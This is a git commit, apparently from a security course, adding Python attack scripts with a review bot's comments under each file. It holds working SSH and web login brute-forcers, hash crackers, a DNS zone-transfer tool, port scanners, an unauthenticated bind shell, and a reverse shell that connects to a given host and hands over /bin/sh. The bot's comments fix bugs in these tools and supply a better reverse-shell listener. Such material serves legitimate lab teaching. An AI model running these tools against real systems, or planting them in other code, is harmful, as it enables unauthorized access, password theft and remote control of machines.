authorjerome <jerome@xlinfo.fr>2025-10-12 17:41:43 +0200
committerjerome <jerome@xlinfo.fr>2025-10-12 17:41:43 +0200
commitec8893a097a6c0fffebd7db9e4a5568a3bf4df47 (patch)
treeffebe60c3aa98df05d14aec8cea937430272c1ec
parentba41fa46e69dbb264dfbed1b9fca5daab44a07c7 (diff)
organisation
-rw-r--r--bruteforce/bruteSSH.py30
-rw-r--r--bruteforce/bruteWeb.py37
-rw-r--r--bruteforce/sshClient.py24
-rw-r--r--bruteforce/webClient.py16
-rw-r--r--crypto/cesar.py50
-rw-r--r--crypto/crack_hash.py33
-rw-r--r--crypto/crack_md5.py24
-rw-r--r--crypto/rot13.py16
-rw-r--r--scan/dns_zone_xfer.py30
-rw-r--r--scan/nmapscanner.py34
-rw-r--r--scan/scan.py25
-rw-r--r--sockets/bindshell.py31
-rw-r--r--sockets/chat_client.py26
-rw-r--r--sockets/chat_server.py29
-rw-r--r--sockets/reverseshell.py18
-rw-r--r--sockets/reverseshell_listener.py36
16 files changed, 459 insertions, 0 deletions
diff --git a/bruteforce/bruteSSH.py b/bruteforce/bruteSSH.py
new file mode 100644
index 0000000..32c93cb
--- /dev/null
+++ b/bruteforce/bruteSSH.py
@@ -0,0 +1,30 @@
+import paramiko, sys
+
+def bruteforce(hostname, username, password):
+ client = paramiko.SSHClient()
+ client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+ try:
+ client.connect(hostname, username=username, password=password)
+ except paramiko.ssh_exception.AuthenticationException:
+ print("erreur : ",password)
+ #pass
+ else:
+ print("trouvé : ",password)
+ return True
+ finally:
+ client.close()
+
+if __name__ == "__main__":
+ hostname = sys.argv[1]
+ username = sys.argv[2]
+ dico = sys.argv[3]
+ try:
+ with open(dico, 'r') as wordlist:
+ for ligne in wordlist.readlines():
+ password=ligne.strip()
+ if bruteforce(hostname,username,password)==True:
+ sys.exit()
+ except IndexError:
+ print(f"{sys.argv[0]} demande un hôte, un username et une liste de passwords en arguments")
+
+
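Review bot: The `except IndexError` at the bottom of the main block can never fire for missing arguments, because the three `sys.argv[...]` reads happen before the `try:`, so a missing argument prints a traceback instead of the usage message; move `hostname = sys.argv[1]`, `username = sys.argv[2]` and `dico = sys.argv[3]` under the `try:`. `bruteforce()` also catches only `AuthenticationException`, so a refused connection, a timeout or a server-side lockout (`paramiko.SSHException`, `OSError`) aborts the whole run mid-wordlist rather than being reported. Separately, `AutoAddPolicy()` trusts whatever host key the target presents, which is acceptable for a lab box but means every password in the list is sent to whoever answers on that address; `client.load_system_host_keys()` with the default `RejectPolicy()` is the safer setting when the host is already known.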
diff --git a/bruteforce/bruteWeb.py b/bruteforce/bruteWeb.py
new file mode 100644
index 0000000..e75cde1
--- /dev/null
+++ b/bruteforce/bruteWeb.py
@@ -0,0 +1,37 @@
+import sys
+import requests
+
+def bruteforce(method,url,username,password,error_msg):
+ if method == "post":
+ reponse=requests.post(url,data={
+ "username":username,
+ "password":password
+ })
+ elif method == "get":
+ reponse=requests.get(url,params={
+ "username":username,
+ "password":password
+ })
+
+ if error_msg in reponse.text:
+ #print("erreur : ",password)
+ pass
+ else:
+ print("trouvé : ",password)
+ return True
+
+if __name__ == "__main__":
+ method = sys.argv[1]
+ url = sys.argv[2]
+ username = sys.argv[3]
+ dico = sys.argv[4]
+ error_msg= sys.argv[5]
+ with open(dico, 'r') as wordlist:
+ for ligne in wordlist.readlines():
+ # le fichier nmap.lst à des commentaires en début de fichier
+ if ligne[0] != "#":
+ password=ligne.strip()
+ if bruteforce(method,url,username,password,error_msg)==True:
+ sys.exit()
+
+
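Review bot: `reponse` is only assigned inside the `post`/`get` branches, so any other `method` value reaches `if error_msg in reponse.text` and fails with `UnboundLocalError`; an explicit `else: raise ValueError(f"unsupported method: {method}")` gives a clear message instead. The `requests` calls carry no `timeout=`, so a single stalled response hangs the wordlist loop indefinitely — `requests.post(url, data={...}, timeout=10)` and the same for `get`. Note also that success is inferred from `error_msg` being absent, so a rate-limit or WAF page that does not contain the string is reported as `trouvé`; checking the status code or a positive success marker as well would reduce false positives.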
diff --git a/bruteforce/sshClient.py b/bruteforce/sshClient.py
new file mode 100644
index 0000000..41dabb4
--- /dev/null
+++ b/bruteforce/sshClient.py
@@ -0,0 +1,24 @@
+import sys, paramiko, getpass
+
+def sshClient(hostname,port,cmd,username,password):
+ client = paramiko.SSHClient()
+ client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+ try:
+ client.connect(hostname,port=port,username=username, password=password)
+ _stdin, _stdout,_stderr = client.exec_command(cmd)
+ print(_stdout.read().decode())
+ except paramiko.ssh_exception.AuthenticationException:
+ print("Erreur d'authenfication !")
+ finally:
+ client.close()
+
+if __name__ == "__main__":
+ try:
+ hostname = sys.argv[1]
+ port = sys.argv[2]
+ cmd = sys.argv[3]
+ username = input("Nom d'utilisateur : ")
+ password = getpass.getpass()
+ sshClient(hostname,port,cmd,username,password)
+ except IndexError:
+ print(f"{sys.argv[0]} demande des arguments")
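Review bot: `port` is handed to `client.connect` as the raw `sys.argv[2]` string; paramiko's address resolution may tolerate a numeric string, but its host-key lookup formats the port as a number, so `port = int(sys.argv[2])` is the safe call (and the resulting `ValueError` on bad input is not covered by `except IndexError`). Because this client sends a password the user just typed, `AutoAddPolicy()` is the bigger concern: any machine answering on `hostname:port` is silently trusted and receives the credentials, so prefer `client.load_system_host_keys()` and the default `RejectPolicy()` (or `WarningPolicy()`) outside a throwaway lab. `_stderr` is never read, so a command that fails remotely prints nothing; `print(_stderr.read().decode(), file=sys.stderr)` after the stdout line would surface it.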
diff --git a/bruteforce/webClient.py b/bruteforce/webClient.py
new file mode 100644
index 0000000..4bd6ac2
--- /dev/null
+++ b/bruteforce/webClient.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python
+
+import requests
+
+def webClient(url,username,os):
+ response = requests.get(url,params={
+ "username": username,
+ "os": os
+ })
+ print(response.text)
+
+webClient("http://10.20.236.161:4444/page.php","jerome","Linux")
+
+
+
+
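Review bot: The `webClient(...)` call at module level runs on import and targets a hard-coded lab address (`10.20.236.161:4444`), so the script cannot be reused without editing it; wrap the call in `if __name__ == "__main__":` and take the URL, user and OS from `sys.argv` as the sibling scripts do. `requests.get` has no `timeout=`, so an unreachable host blocks until the OS gives up — `requests.get(url, params={...}, timeout=10)`. The parameter named `os` shadows the `os` module name, harmless here but confusing next to the other scripts in this commit that import it.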
diff --git a/crypto/cesar.py b/crypto/cesar.py
new file mode 100644
index 0000000..cc58d8f
--- /dev/null
+++ b/crypto/cesar.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+
+import string
+
+
+def decalage(char, key):
+ liste = list(string.ascii_lowercase)*2 + list(string.ascii_uppercase)*2
+ #print(liste)
+ if char not in liste:
+ return char
+ else:
+ return liste[liste.index(char)+key]
+
+# print(decalage("a",3))
+
+
+print("********************")
+print("Chiffrement de César")
+print("********************")
+
+menu = ["c) Chiffrer un message", "d) Dechiffrer un message", "q) Quitter"]
+
+while True:
+ for choix in menu:
+ print(choix)
+ rep = input("Votre choix : ")
+ match rep.lower():
+ case "c":
+ msgChiffre = str()
+ msg = input("Votre message : ")
+ clef = int(input("Entrez votre clef (entre 1 et 25) : "))
+ for lettre in msg:
+ #msgChiffre = msgChiffre + decalage(lettre,clef)
+ msgChiffre += decalage(lettre, clef)
+ print("\nVotre message chiffré : ", msgChiffre, "\n")
+ print("********************")
+ msg = ""
+ msgChiffre = ""
+ case "d":
+ msg = str()
+ msgChiffre = input("Votre message : ")
+ for clef in range(25,0,-1):
+ for lettre in msgChiffre:
+ msg += decalage(lettre, clef)
+ print(f"rot{26-clef} : {msg}")
+ msg = ""
+ print("********************")
+ case "q":
+ print("bye")
+ exit()
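Review bot: The key prompt says 1–25 but nothing enforces it, and `decalage` indexes `liste[liste.index(char)+key]` on a doubled alphabet, so a key of 27 silently turns `z` into `A` and a larger one raises `IndexError` mid-message; reducing the shift with `return liste[liste.index(char) + key % 26]` keeps any integer key in range and also accepts negative keys for decryption. `int(input(...))` raises `ValueError` on non-numeric input and ends the menu loop with a traceback, so a `try`/`except ValueError` around the key prompt would keep the menu alive. In the `d` branch the label `rot{26-clef}` is right because shifting by `clef` undoes a shift of `26-clef`, but a one-line comment saying so would save the next reader the arithmetic.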
diff --git a/crypto/crack_hash.py b/crypto/crack_hash.py
new file mode 100644
index 0000000..b51cec7
--- /dev/null
+++ b/crypto/crack_hash.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+"""crack_hash module"""
+import sys
+import hashlib
+import argparse
+
+
+
+def crack_hash(hashlist, wordlist, hashsum):
+ """
+ Args:
+ hashlist la liste de hashes à trouver
+ wordlist: le dictionnaire
+ hashsum: la somme de controle : md5,sha256 ou sha512
+ """
+ with open(hashlist,"r") as fichier1:
+ hashes=fichier1.readlines()
+ for hash in hashes:
+ with open(wordlist, "r") as fichier2:
+ lignes = fichier2.readlines()
+ for ligne in lignes:
+ if getattr(hashlib,hashsum)(ligne.strip().encode()).hexdigest() == hash.strip():
+ print(f"trouvé: {ligne.strip()}")
+ break
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument('hashlist', help='La liste de hash à trouver')
+ parser.add_argument('wordlist', help='Le dictionnaire choisi')
+ parser.add_argument('hashsum', help='la somme de contrôle : md5,sha256 ou sha512')
+ parser.parse_args()
+ crack_hash(sys.argv[1], sys.argv[2], sys.argv[3])
+
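Review bot: `parser.parse_args()` is called but its result is discarded and the function is fed `sys.argv[1:4]` directly, so the argparse definition validates nothing the code actually uses; write `args = parser.parse_args()` and `crack_hash(args.hashlist, args.wordlist, args.hashsum)`. With that in place, `hashsum` can be restricted with `choices=["md5", "sha256", "sha512"]` — today `getattr(hashlib, hashsum)` accepts any attribute of the module (`pbkdf2_hmac`, `new`, ...) and fails with an unrelated `TypeError`; `hashlib.new(hashsum, data)` is the idiomatic call either way. The wordlist is also re-read and re-hashed once per target hash, so hashing it once into a `dict` digest→word and looking each target up (lower-cased, since `hexdigest()` is lowercase) would make the loop linear. `hash` shadows the builtin.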
diff --git a/crypto/crack_md5.py b/crypto/crack_md5.py
new file mode 100644
index 0000000..00bac2b
--- /dev/null
+++ b/crypto/crack_md5.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+"""crack_md5 module"""
+import sys
+import hashlib
+
+def crack_md5(hash, wordlist):
+ """
+ Args:
+ hash : le hash à trouver
+ wordlist: le dictionnaire
+ """
+ with open(wordlist, "r") as fichier:
+ lignes = fichier.readlines()
+ for ligne in lignes:
+ if hashlib.md5(ligne.strip().encode()).hexdigest() == hash.strip():
+ print(f"trouvé: {ligne.strip()}")
+ break
+
+if __name__ == "__main__":
+ try:
+ crack_md5(sys.argv[1], sys.argv[2])
+ except IndexError:
+ print(f"{sys.argv[0]} demande des arguments. Voir l'aide.")
+
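Review bot: The comparison `== hash.strip()` is case-sensitive while `hexdigest()` is lowercase, so an uppercase hash copied from a dump is never matched; compare against `hash.strip().lower()`. Opening the wordlist in text mode means a list containing non-UTF-8 bytes (common in leaked-password lists) aborts with `UnicodeDecodeError` on the first bad line; `open(wordlist, "rb")` and `hashlib.md5(ligne.strip())` avoid both the crash and the per-line `.encode()`. `readlines()` loads the whole list into memory, whereas iterating `for ligne in fichier:` streams it. `hash` shadows the builtin.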
diff --git a/crypto/rot13.py b/crypto/rot13.py
new file mode 100644
index 0000000..b2730f1
--- /dev/null
+++ b/crypto/rot13.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python
+
+import string
+
+def rot13(char):
+ liste = list(string.ascii_lowercase)*2 + list(string.ascii_uppercase)*2
+ if char not in liste:
+ return char
+ else:
+ return liste[liste.index(char)+13]
+
+msg = input("Votre message : ")
+msgChiffre = str()
+for lettre in msg:
+ msgChiffre = msgChiffre + rot13(lettre)
+print(msgChiffre)
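Review bot: The `rot13` helper reimplements a codec the standard library already ships: `codecs.encode(msg, "rot_13")` produces the same result for ASCII letters and leaves every other character untouched, so the doubled-alphabet lookup can go. If the helper stays, a docstring stating that non-ASCII-letter characters are returned unchanged would document the `if char not in liste` branch. The prompt and print run at import time; an `if __name__ == "__main__":` guard would match the other scripts in this commit.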
diff --git a/scan/dns_zone_xfer.py b/scan/dns_zone_xfer.py
new file mode 100644
index 0000000..9459cc2
--- /dev/null
+++ b/scan/dns_zone_xfer.py
@@ -0,0 +1,30 @@
+#!/bin/python3
+import dns.resolver
+import dns.zone
+
+def dns_zone_xfer(address):
+ ns_answer = dns.resolver.resolve(address, 'NS')
+ for server in ns_answer:
+ print("[*] Found NS: {}".format(server))
+ ip_answer = dns.resolver.resolve(server.target, 'A')
+ for ip in ip_answer:
+ print("[*] IP for {} is {}".format(server, ip))
+ try:
+ zone = dns.zone.from_xfr(dns.query.xfr(str(ip), address))
+ hosts = zone.nodes.keys() # a node is a set of rdatasets
+ for host in hosts:
+ print(zone[host].to_text(host)) # convert a node to text format
+ except dns.xfr.TransferError:
+ print("[*] NS {} refused zone transfer !".format(server))
+ continue
+ except dns.exception.FormError:
+ print("No answer or RRset for {}".format(address))
+ continue
+
+#dns_zone_xfer('megacorpone.com')
+if __name__ == "__main__":
+ import sys
+ try:
+ dns_zone_xfer(sys.argv[1])
+ except IndexError:
+ print(f"{sys.argv[0]} demande un nom de domaine en argument")
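Review bot: `dns.query.xfr` and `dns.xfr.TransferError` are used but neither `dns.query` nor `dns.xfr` is imported; this works only if `dns.resolver`/`dns.zone` happen to pull them in transitively, so add explicit `import dns.query`, `import dns.xfr` and `import dns.exception` (for `FormError`). `dns.resolver.resolve(address, 'NS')` raises `NXDOMAIN`/`NoAnswer`/`LifetimeTimeout` for a bad or unresponsive domain and none of these are caught, and the inner `except` clauses also miss plain socket errors (`OSError`, refused or timed-out connection) from the AXFR attempt, so the per-server `try` should widen to `except (dns.exception.DNSException, OSError)`. Passing `timeout=`/`lifetime=` to `dns.query.xfr` keeps a silently dropping nameserver from hanging the scan.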
diff --git a/scan/nmapscanner.py b/scan/nmapscanner.py
new file mode 100644
index 0000000..5cd0659
--- /dev/null
+++ b/scan/nmapscanner.py
@@ -0,0 +1,34 @@
+import sys
+import nmap
+
+def nmscan(hosts,ports,arguments='-sV'):
+ nm = nmap.PortScanner()
+ nm.scan(hosts,ports,arguments)
+
+
+ for host in nm.all_hosts():
+ print('----------------------------------------------------')
+ print('Host : %s (%s)' % (host, nm[host].hostname()))
+ print('State : %s' % nm[host].state())
+ for proto in nm[host].all_protocols():
+ print('----------')
+ print('Protocol : %s' % proto)
+
+ lport = nm[host][proto].keys()
+ #lport.sort()
+ for port in lport:
+ print("Port : {}\tState : {}\tService : {} ({} - {})".format(port, nm[host][proto][port]['state'], nm[host][proto][port]['name'], nm[host][proto][port]['product'], nm[host][proto][port]['version']))
+
+# nmscan("xlinfo.fr","22-443")
+# nmscan("xlinfo.fr","53","-sU -sV") en sudo...
+# nmscan("192.168.2.0/24","22")
+
+if __name__ == "__main__" :
+ try:
+ if len(sys.argv) > 3:
+ nmscan(sys.argv[1],sys.argv[2],sys.argv[3])
+ else:
+ nmscan(sys.argv[1],sys.argv[2])
+ except:
+ print(f"{sys.argv[0]} demande un ou plusieurs hôtes, une liste de ports, et des arguments optionnels")
+
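Review bot: The bare `except:` at the bottom swallows every failure — `nmap.PortScannerError` when the nmap binary is missing or `-sU` needs root, a `KeyError` from a host entry lacking `product`/`version`, even `KeyboardInterrupt` — and reports all of them as a usage error; narrow it to `except IndexError:` and let the others surface. The `arguments` string from `sys.argv[3]` is handed to nmap as-is, which is fine for an operator-driven CLI but worth a comment so nobody later feeds it untrusted input. `#lport.sort()` is dead code; `for port in sorted(lport):` gives ordered output.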
diff --git a/scan/scan.py b/scan/scan.py
new file mode 100644
index 0000000..38150b2
--- /dev/null
+++ b/scan/scan.py
@@ -0,0 +1,25 @@
+import sys
+import socket
+
+def scan(host,*ports):
+ for port in ports:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(2) # Set a 2-second timeout
+ addr_server=(host,int(port))
+ tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès...
+ if tentative==0:
+ print(f"Le port {port} ouvert")
+ try:
+ print(s.recv(1024).decode().strip())
+ except TimeoutError:
+ pass
+ else:
+ print(f"Le port {port} fermé")
+ s.close()
+
+if __name__ == "__main__" :
+ try:
+ scan(sys.argv[1],*sys.argv[2:])
+ except:
+ print(f"{sys.argv[0]} demande un hôte et une liste de ports en arguments")
+
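Review bot: The bare `except:` in the main block turns any runtime error (`socket.gaierror` for a bad hostname, `ValueError` from a non-numeric port, `ConnectionResetError` from `recv`) into the usage message; `except IndexError:` is what the message describes. Inside `scan` the socket is only closed on the normal path — if `recv` raises anything other than `TimeoutError` the descriptor leaks — so open it as `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:`. `connect_ex` returns an errno for unreachable or filtered ports too, so printing `fermé` for every non-zero value overstates what was learned; reporting `errno.errorcode.get(tentative)` distinguishes refused from filtered.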
diff --git a/sockets/bindshell.py b/sockets/bindshell.py
new file mode 100644
index 0000000..5213002
--- /dev/null
+++ b/sockets/bindshell.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+
+import sys, os, socket
+
+def bindshell(port):
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(('',port))
+ s.listen()
+ conn,addr = s.accept()
+ while 1:
+ data = conn.recv(1024)
+ reponse = os.popen(data.decode().strip()).read()
+ conn.sendall(str(reponse).encode())
+ except KeyboardInterrupt:
+ s.close()
+ finally:
+ print("bye")
+
+if __name__ == "__main__":
+ try:
+ bindshell(int(sys.argv[1]))
+ except IndexError:
+ print(f"{sys.argv[0]} demande un port en agument")
+
+
+
+
+
+
+
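Review bot: When the connected client disconnects, `conn.recv` returns `b""` forever and the loop then runs `os.popen("")` in a tight spin, so the process burns CPU until killed; add `if not data: break` right after the `recv`. `conn` is never closed and `s.close()` only runs on `KeyboardInterrupt`; `with` blocks on both sockets would cover every exit path. As written this binds to every interface (`''`) and executes whatever text arrives through a shell with no authentication — expected for a bindshell exercise, but a one-line docstring stating it is a lab-only tool is appropriate.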
diff --git a/sockets/chat_client.py b/sockets/chat_client.py
new file mode 100644
index 0000000..affc1d3
--- /dev/null
+++ b/sockets/chat_client.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+
+import sys,socket,os
+
+def chat_client(host,port):
+ whoami = os.getenv("USER")
+ try:
+ s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.connect((host,port))
+ while True:
+ message = input("moi > ")
+ message = whoami+" > "+message # à commenter pour le bindshell
+ s.sendall(message.encode())
+ data = s.recv(1024)
+ print(data.decode().strip())
+ except KeyboardInterrupt:
+ s.close()
+ finally:
+ print("bye")
+
+if __name__ == "__main__":
+ try:
+ chat_client(sys.argv[1],int(sys.argv[2]))
+ except IndexError:
+ print(f"{sys.argv[0]} demande un hôte où se connecter et un numéro de port")
+
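Review bot: `os.getenv("USER")` returns `None` when the variable is unset (Windows sets `USERNAME`; some service environments set nothing), and `whoami+" > "+message` then fails with `TypeError`; `getpass.getuser()` or `os.getenv("USER", "moi")` avoids that. A server that closes the connection makes `recv` return `b""`, which the loop prints as an empty line before prompting again; `if not data: break` ends it cleanly. `recv(1024)` also truncates longer replies, which matters once this client is pointed at the bindshell as the inline comment suggests.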
diff --git a/sockets/chat_server.py b/sockets/chat_server.py
new file mode 100644
index 0000000..aecf8c9
--- /dev/null
+++ b/sockets/chat_server.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python3
+
+import sys,socket,os
+
+def chat_server(port):
+ whoami = os.getenv("USER")
+ try:
+ s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.bind(('',port))
+ s.listen()
+ conn,addr = s.accept()
+ print(f"Connexion depuis {addr[0]} sur le port {addr[1]}")
+ while True:
+ data = conn.recv(1024)
+ print(data.decode())
+ reponse = input("moi > ")
+ reponse = whoami+" > "+reponse
+ conn.sendall(reponse.encode().strip())
+ except KeyboardInterrupt:
+ s.close()
+ finally:
+ print("bye")
+
+if __name__ == "__main__":
+ try:
+ chat_server(int(sys.argv[1]))
+ except IndexError:
+ print(f"{sys.argv[0]} demande un numéro de port en argument")
+
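Review bot: When the client disconnects, `conn.recv` returns `b""`, the loop prints an empty line, blocks in `input()` and then dies with `BrokenPipeError` on `sendall`; test `if not data: break` immediately after the `recv`. `os.getenv("USER")` may be `None`, making the concatenation on the next line raise `TypeError` — `getpass.getuser()` is the portable choice. The listening socket is bound to `''` (all interfaces) and the chat is plaintext; fine for an exercise, but worth stating in a comment.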
diff --git a/sockets/reverseshell.py b/sockets/reverseshell.py
new file mode 100644
index 0000000..fc7e860
--- /dev/null
+++ b/sockets/reverseshell.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+
+import sys, os, socket
+
+def reverseshell(host,port):
+ s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.connect((host,port))
+ os.dup2(s.fileno(),0)
+ os.dup2(s.fileno(),1)
+ os.dup2(s.fileno(),2)
+ os.system("/bin/sh -i")
+
+if __name__ == "__main__":
+ try:
+ reverseshell(sys.argv[1],int(sys.argv[2]))
+ except IndexError:
+ print(f"{sys.argv[0]} demande un hôte et un port en agument")
+
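Review bot: `int(sys.argv[2])` raises `ValueError` for a non-numeric port and `s.connect` raises `ConnectionRefusedError`/`OSError` when no listener is up, and neither is covered by `except IndexError`, so those cases end in a traceback; a docstring should at least say the listener must be started first. The `dup2` calls onto fds 0/1/2 and `/bin/sh -i` make this POSIX-only, which the file should state in its docstring. After `os.system` returns the socket is still open; `s.close()` after it (or `with socket.socket(...) as s:`) tidies the exit.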
diff --git a/sockets/reverseshell_listener.py b/sockets/reverseshell_listener.py
new file mode 100644
index 0000000..23eb39a
--- /dev/null
+++ b/sockets/reverseshell_listener.py
@@ -0,0 +1,36 @@
+#!/usr/bin/env python
+
+import sys,socket,time
+
+def chat_server(port):
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(('',port))
+ s.listen()
+ conn,addr = s.accept()
+ print(f"Connexion depuis {addr[0]} sur le port {addr[1]}")
+ while True:
+ data = conn.recv(4096)
+ print(data.decode(),end="")
+ command = input()
+ command += "\n"
+ conn.send(command.encode())
+ time.sleep(0.1)
+ except KeyboardInterrupt:
+ s.close()
+ finally:
+ print("bye")
+
+if __name__ == "__main__":
+ try:
+ chat_server(int(sys.argv[1]))
+ except IndexError:
+ print(f"{sys.argv[0]} demande un port en agument")
+
+
+
+
+
+
+
+
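Review bot: The loop does exactly one `recv(4096)` per command, so any shell output larger than 4096 bytes, or arriving in several TCP segments, stays in the socket and is shown only after the next command is typed — prompt and output drift apart. Draining the socket with `select` until it goes quiet before calling `input()` fixes this; the rewrite below also stops on `b""` (peer gone) instead of spinning, uses `sendall` rather than `send`, and drops the `time.sleep`, with `select` imported at the top of the file. The function is named `chat_server` although the file is the reverse-shell listener; renaming it `listener` (and updating the `__main__` call) would avoid confusion with `chat_server.py`.
```python
        conn,addr = s.accept()
        print(f"Connexion depuis {addr[0]} sur le port {addr[1]}")
        while True:
            # drain whatever the shell has sent before prompting for the next command
            ready = select.select([conn], [], [], 0.2)[0]
            if ready:
                data = conn.recv(4096)
                if not data:  # peer closed the connection
                    break
                print(data.decode(errors="replace"), end="", flush=True)
                continue
            command = input() + "\n"
            conn.sendall(command.encode())
        # … unchanged: except KeyboardInterrupt / finally …
```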